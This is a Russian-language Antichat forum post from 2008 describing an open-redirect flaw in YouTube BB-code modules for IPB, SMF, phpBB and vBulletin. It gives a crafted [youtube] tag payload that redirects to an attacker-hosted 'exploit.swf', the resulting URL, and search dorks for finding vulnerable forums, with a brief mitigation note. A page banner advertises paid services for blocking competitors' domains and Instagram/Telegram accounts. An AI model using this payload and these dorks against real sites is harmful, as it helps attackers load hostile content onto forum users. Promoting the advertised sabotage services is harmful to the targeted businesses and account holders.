Vulnerability Youtube [BB Code]

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Vulnerability Youtube [BB Code]

Опции темы

Поиск в этой теме

Опции просмотра

Vulnerability Youtube [BB Code]

24.04.2008, 01:28

ettee

Administrator

Регистрация: 12.10.2006

Сообщений: 466

Провел на форуме:
17234747

Репутация: 5170

Vulnerability Youtube [BB Code]

В составляющей части существующих модулей отсутствует проверка домена, что дает для атакующего возможность редиректа с помощью getURL.

PHP код:


		
			
youtube.com/v/[param_here]

& 

$txt['youtube'] = 'YouTube';

Пример:
[youtube]../redirection?page=http://exploit.swf/[/youtube]

Получение активного редиректа:

PHP код:


		
			
http://www.youtube.com/v/../redirection?page=http://exploit.swf/

Присутствие модуля:
IPB
SMF
phpBB
vBulletin
etc

Воизбежание атаки рекомендуется использовать allowScriptAccess="never" / allownetworking="internal" / регулярное выражение.

dork:
BB Code : [yt] [/yt] /forum/
BB Code : [youtube] [/youtube] /forum/

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
YouTube будет следить за зрителями	Out	Мировые новости. Обсуждения.	8	29.03.2008 02:11

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules